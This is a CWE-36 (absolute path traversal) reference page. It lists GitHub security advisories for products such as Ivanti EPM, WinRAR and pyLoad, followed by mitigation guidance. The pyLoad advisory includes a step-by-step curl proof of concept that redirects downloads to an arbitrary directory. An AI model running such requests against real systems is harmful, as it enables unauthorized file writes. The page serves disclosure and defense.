Common Weakness Enumeration

CWE-36

Allowed

Absolute Path Traversal

Abstraction: Base · Status: Draft

The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize absolute path sequences such as "/abs/path" that can resolve to a location that is outside of that directory.

245 vulnerabilities reference this CWE, most recent first.

GHSA-6H7G-F9WV-5JQ5

Vulnerability from github – Published: 2022-05-24 19:07 – Updated: 2022-05-24 19:07
VLAI
Details

Absolute Path Traversal vulnerability in GetImage in QSAN Storage Manager allows remote authenticated attackers download arbitrary files via the Url path parameter.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-32506"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-36"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-07-07T14:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Absolute Path Traversal vulnerability in GetImage in QSAN Storage Manager allows remote authenticated attackers download arbitrary files via the Url path parameter.",
  "id": "GHSA-6h7g-f9wv-5jq5",
  "modified": "2022-05-24T19:07:04Z",
  "published": "2022-05-24T19:07:04Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32506"
    },
    {
      "type": "WEB",
      "url": "https://www.twcert.org.tw/tw/cp-132-4862-f8b86-1.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-6PWX-MRWJ-WC74

Vulnerability from github – Published: 2025-09-12 06:30 – Updated: 2025-09-12 06:30
VLAI
Details

The LWS Cleaner plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'lws_cl_delete_file' function in all versions up to, and including, 2.4.1.3. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-8575"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-36"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-09-12T06:15:43Z",
    "severity": "HIGH"
  },
  "details": "The LWS Cleaner plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the \u0027lws_cl_delete_file\u0027 function in all versions up to, and including, 2.4.1.3. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).",
  "id": "GHSA-6pwx-mrwj-wc74",
  "modified": "2025-09-12T06:30:26Z",
  "published": "2025-09-12T06:30:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8575"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/lws-cleaner/trunk/lws-cleaner.php#L1144"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/3359598"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fa37025a-7f20-4cfe-a7d0-38168f49b6d9?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-6QQ9-3Q4Q-R8RX

Vulnerability from github – Published: 2025-08-22 12:30 – Updated: 2025-08-22 12:30
VLAI
Details

WebITR developed by Uniong has an Arbitrary File Reading vulnerability, allowing remote attackers with regular privileges to exploit Absolute Path Traversal to download arbitrary system files.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-9258"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-36"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-08-22T12:15:34Z",
    "severity": "HIGH"
  },
  "details": "WebITR developed by Uniong has an Arbitrary File Reading vulnerability, allowing remote attackers with regular privileges to exploit Absolute Path Traversal to download arbitrary system files.",
  "id": "GHSA-6qq9-3q4q-r8rx",
  "modified": "2025-08-22T12:30:31Z",
  "published": "2025-08-22T12:30:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9258"
    },
    {
      "type": "WEB",
      "url": "https://www.twcert.org.tw/en/cp-139-10329-a1c5d-2.html"
    },
    {
      "type": "WEB",
      "url": "https://www.twcert.org.tw/tw/cp-132-10328-dbc35-1.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-6V62-48R8-7WH2

Vulnerability from github – Published: 2025-01-14 18:32 – Updated: 2025-10-22 00:33
VLAI
Details

Absolute path traversal in Ivanti EPM before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update allows a remote unauthenticated attacker to leak sensitive information.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-13159"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-36"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-01-14T18:15:26Z",
    "severity": "CRITICAL"
  },
  "details": "Absolute path traversal in Ivanti EPM before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update allows a remote unauthenticated attacker to leak sensitive information.",
  "id": "GHSA-6v62-48r8-7wh2",
  "modified": "2025-10-22T00:33:12Z",
  "published": "2025-01-14T18:32:01Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13159"
    },
    {
      "type": "WEB",
      "url": "https://forums.ivanti.com/s/article/Security-Advisory-EPM-January-2025-for-EPM-2024-and-EPM-2022-SU6"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-13159"
    },
    {
      "type": "WEB",
      "url": "https://www.horizon3.ai/attack-research/attack-blogs/ivanti-endpoint-manager-multiple-credential-coercion-vulnerabilities"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-787C-QPX2-RPG5

Vulnerability from github – Published: 2023-07-13 03:30 – Updated: 2024-04-04 06:06
VLAI
Details

Path Traversal vulnerability in SonicWall GMS and Analytics allows a remote authenticated attacker to read arbitrary files from the underlying file system via web service. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-34135"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-36"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-07-13T03:15:09Z",
    "severity": "MODERATE"
  },
  "details": "Path Traversal vulnerability in SonicWall GMS and Analytics allows a remote authenticated attacker to read arbitrary files from the underlying file system via web service. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions.\n\n",
  "id": "GHSA-787c-qpx2-rpg5",
  "modified": "2024-04-04T06:06:15Z",
  "published": "2023-07-13T03:30:48Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34135"
    },
    {
      "type": "WEB",
      "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0010"
    },
    {
      "type": "WEB",
      "url": "https://www.sonicwall.com/support/notices/230710150218060"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7HHJ-47V7-PG7C

Vulnerability from github – Published: 2026-07-10 06:31 – Updated: 2026-07-10 06:31
VLAI
Details

The ARMember plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 4.0.27 via the 'X-FILENAME' HTTP header. This makes it possible for unauthenticated attackers to upload and overwrite certain files (e.g., CSS) to directories outside the 'wp-content/uploads/armember' directory.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-15302"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-36"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-07-10T05:16:33Z",
    "severity": "MODERATE"
  },
  "details": "The ARMember plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 4.0.27 via the \u0027X-FILENAME\u0027 HTTP header. This makes it possible for unauthenticated attackers to upload and overwrite certain files (e.g., CSS) to directories outside the \u0027wp-content/uploads/armember\u0027 directory.",
  "id": "GHSA-7hhj-47v7-pg7c",
  "modified": "2026-07-10T06:31:21Z",
  "published": "2026-07-10T06:31:21Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-15302"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/3062692/armember-membership/trunk/core/classes/class.arm_members_activity.php"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2c8734f5-4d23-454d-bf00-6e9d36982098?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7HR6-MVJP-X5QV

Vulnerability from github – Published: 2025-06-29 00:30 – Updated: 2025-06-29 00:30
VLAI
Details

In Netgate pfSense CE 2.8.0, the "WebCfg - Diagnostics: Command" privilege allows reading arbitrary files via diag_command.php dlPath directory traversal. NOTE: the Supplier's perspective is that this is intended behavior for this privilege level, and that system administrators are informed through both the product documentation and UI.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-53392"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-36"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-06-28T23:15:21Z",
    "severity": "MODERATE"
  },
  "details": "In Netgate pfSense CE 2.8.0, the \"WebCfg - Diagnostics: Command\" privilege allows reading arbitrary files via diag_command.php dlPath directory traversal. NOTE: the Supplier\u0027s perspective is that this is intended behavior for this privilege level, and that system administrators are informed through both the product documentation and UI.",
  "id": "GHSA-7hr6-mvjp-x5qv",
  "modified": "2025-06-29T00:30:19Z",
  "published": "2025-06-29T00:30:19Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53392"
    },
    {
      "type": "WEB",
      "url": "https://github.com/skraft9/pfsense-security-research"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7J6H-J855-CHVW

Vulnerability from github – Published: 2026-03-06 15:31 – Updated: 2026-03-10 18:31
VLAI
Details

An Absolute Path Traversal vulnerability exists in Navtor NavBox. The application exposes an HTTP service that fails to properly sanitize user-supplied path input. Unauthenticated remote attackers can exploit this issue by submitting requests containing absolute filesystem paths. Successful exploitation allows the attacker to retrieve arbitrary files from the underlying filesystem, limited only by the privileges of the service process. This can lead to the exposure of sensitive configuration files and system information.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-2753"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-36"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-06T15:16:11Z",
    "severity": "HIGH"
  },
  "details": "An Absolute Path Traversal vulnerability exists in Navtor NavBox. The application exposes an HTTP service that fails to properly sanitize user-supplied path input. Unauthenticated remote attackers can exploit this issue by submitting requests containing absolute filesystem paths. Successful exploitation allows the attacker to retrieve arbitrary files from the underlying filesystem, limited only by the privileges of the service process. This can lead to the exposure of sensitive configuration files and system information.",
  "id": "GHSA-7j6h-j855-chvw",
  "modified": "2026-03-10T18:31:14Z",
  "published": "2026-03-06T15:31:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2753"
    },
    {
      "type": "WEB",
      "url": "https://cydome.io/vulnerability-advisory-cve-2026-2753-in-navtor-navbox-version-4-12-0-3"
    },
    {
      "type": "WEB",
      "url": "https://www.navtor.com/navtor-vendor-statement"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7V9Q-J964-43QC

Vulnerability from github – Published: 2022-05-13 01:32 – Updated: 2025-10-22 00:31
VLAI
Details

In WinRAR versions prior to and including 5.61, There is path traversal vulnerability when crafting the filename field of the ACE format (in UNACEV2.dll). When the filename field is manipulated with specific patterns, the destination (extraction) folder is ignored, thus treating the filename as an absolute path.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-20250"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-36"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-02-05T20:29:00Z",
    "severity": "HIGH"
  },
  "details": "In WinRAR versions prior to and including 5.61, There is path traversal vulnerability when crafting the filename field of the ACE format (in UNACEV2.dll). When the filename field is manipulated with specific patterns, the destination (extraction) folder is ignored, thus treating the filename as an absolute path.",
  "id": "GHSA-7v9q-j964-43qc",
  "modified": "2025-10-22T00:31:37Z",
  "published": "2022-05-13T01:32:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-20250"
    },
    {
      "type": "WEB",
      "url": "https://github.com/blau72/CVE-2018-20250-WinRAR-ACE"
    },
    {
      "type": "WEB",
      "url": "https://research.checkpoint.com/extracting-code-execution-from-winrar"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2018-20250"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/46552"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/46756"
    },
    {
      "type": "WEB",
      "url": "https://www.win-rar.com/whatsnew.html"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/152618/RARLAB-WinRAR-ACE-Format-Input-Validation-Remote-Code-Execution.html"
    },
    {
      "type": "WEB",
      "url": "http://www.rapid7.com/db/modules/exploit/windows/fileformat/winrar_ace"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/106948"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-838G-GR43-QQG9

Vulnerability from github – Published: 2026-05-05 21:18 – Updated: 2026-06-08 19:48
VLAI
Summary
PyLoad vulnerable to Path Traversal via Package Folder Name in set_package_data
Details

Summary

No sanitization of package folder name allows writing files anywhere outside the intended download directory.

Affected Component

  • src/pyload/core/api/__init__.py
  • Function: set_package_data()

Details

When passing a folder name in the set_package_data() API function call inside the data object with key "_folder", there is no sanitization at all, allowing a user with Perms.MODIFY to specify arbitrary directories as download locations for a package.

PoC

1) Create a package, note response package ID e.g. 5

curl -X 'POST' \
  'http://localhost:8000/api/add_package' \
  -H 'accept: application/json' \
  -H 'X-API-Key: <valid api key>' \
  -H 'Content-Type: application/json' \
  -d '{
  "name": "set_package_data_exploit_poc",
  "links": [
    "http://example.com/file.txt"
  ],
  "dest": 1
}'

2) Call set_package_data for this package ID with an arbitrary directory

curl -X 'POST' \
  'http://localhost:8000/api/set_package_data' \
  -H 'accept: */*' \
  -H 'X-API-Key: <valid api key>' \
  -H 'Content-Type: application/json' \
  -d '{
  "package_id": 5,
  "data": {
    "_folder": "/users/root/"
  }
}'

3) New download folder will be set without any checks

curl -X 'GET' \
  'http://localhost:8000/api/get_queue' \
  -H 'accept: application/json' \
  -H 'X-API-Key: <valid api key>'

Response:

[
  {
    "pid": 5,
    "name": "set_package_data_exploit_poc",
    "folder": "/users/root/",
    "site": "",
    "password": "",
    "dest": 1,
    "order": 1,
    "linksdone": 0,
    "sizedone": 0,
    "sizetotal": 0,
    "linkstotal": 1,
    "links": null,
    "fids": null
  }
]

Impact

Allows Absolute Path Traversal to write in an arbitrary directory as long as the pyLoad process has write access.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.5.0b3.dev99"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "pyload-ng"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.5.0b3.dev100"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42315"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-36"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-05T21:18:19Z",
    "nvd_published_at": "2026-05-11T18:16:35Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nNo sanitization of package folder name allows writing files anywhere outside the intended download directory.\n\n#### Affected Component\n- `src/pyload/core/api/__init__.py`\n- Function: `set_package_data()`\n\n### Details\nWhen passing a folder name in the `set_package_data()` API function call inside the data object with key `\"_folder\"`, there is no sanitization at all, allowing a user with `Perms.MODIFY` to specify arbitrary directories as download locations for a package.\n\n### PoC\n1) Create a package, note response package ID e.g. `5`\n```\ncurl -X \u0027POST\u0027 \\\n  \u0027http://localhost:8000/api/add_package\u0027 \\\n  -H \u0027accept: application/json\u0027 \\\n  -H \u0027X-API-Key: \u003cvalid api key\u003e\u0027 \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\n  \"name\": \"set_package_data_exploit_poc\",\n  \"links\": [\n    \"http://example.com/file.txt\"\n  ],\n  \"dest\": 1\n}\u0027\n```\n\n2) Call set_package_data for this package ID with an arbitrary directory \n```\ncurl -X \u0027POST\u0027 \\\n  \u0027http://localhost:8000/api/set_package_data\u0027 \\\n  -H \u0027accept: */*\u0027 \\\n  -H \u0027X-API-Key: \u003cvalid api key\u003e\u0027 \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\n  \"package_id\": 5,\n  \"data\": {\n    \"_folder\": \"/users/root/\"\n  }\n}\u0027\n```\n\n3) New download folder will be set without any checks\n```\ncurl -X \u0027GET\u0027 \\\n  \u0027http://localhost:8000/api/get_queue\u0027 \\\n  -H \u0027accept: application/json\u0027 \\\n  -H \u0027X-API-Key: \u003cvalid api key\u003e\u0027\n```\nResponse:\n```\n[\n  {\n    \"pid\": 5,\n    \"name\": \"set_package_data_exploit_poc\",\n    \"folder\": \"/users/root/\",\n    \"site\": \"\",\n    \"password\": \"\",\n    \"dest\": 1,\n    \"order\": 1,\n    \"linksdone\": 0,\n    \"sizedone\": 0,\n    \"sizetotal\": 0,\n    \"linkstotal\": 1,\n    \"links\": null,\n    \"fids\": null\n  }\n]\n```\n\n### Impact\nAllows Absolute Path Traversal to write in an arbitrary directory as long as the pyLoad process has write access.",
  "id": "GHSA-838g-gr43-qqg9",
  "modified": "2026-06-08T19:48:40Z",
  "published": "2026-05-05T21:18:19Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pyload/pyload/security/advisories/GHSA-838g-gr43-qqg9"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42315"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pyload/pyload"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-129.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "PyLoad vulnerable to Path Traversal via Package Folder Name in set_package_data"
}

Mitigation MIT-5.1
Implementation

Strategy: Input Validation

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
  • Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
  • When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.
  • Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string.
Mitigation MIT-20
Implementation

Strategy: Input Validation

Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked.

Mitigation MIT-29
Operation

Strategy: Firewall

Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].

CAPEC-597: Absolute Path Traversal

An adversary with access to file system resources, either directly or via application logic, will use various file absolute paths and navigation mechanisms such as ".." to extend their range of access to inappropriate areas of the file system. The goal of the adversary is to access directories and files that are intended to be restricted from their access.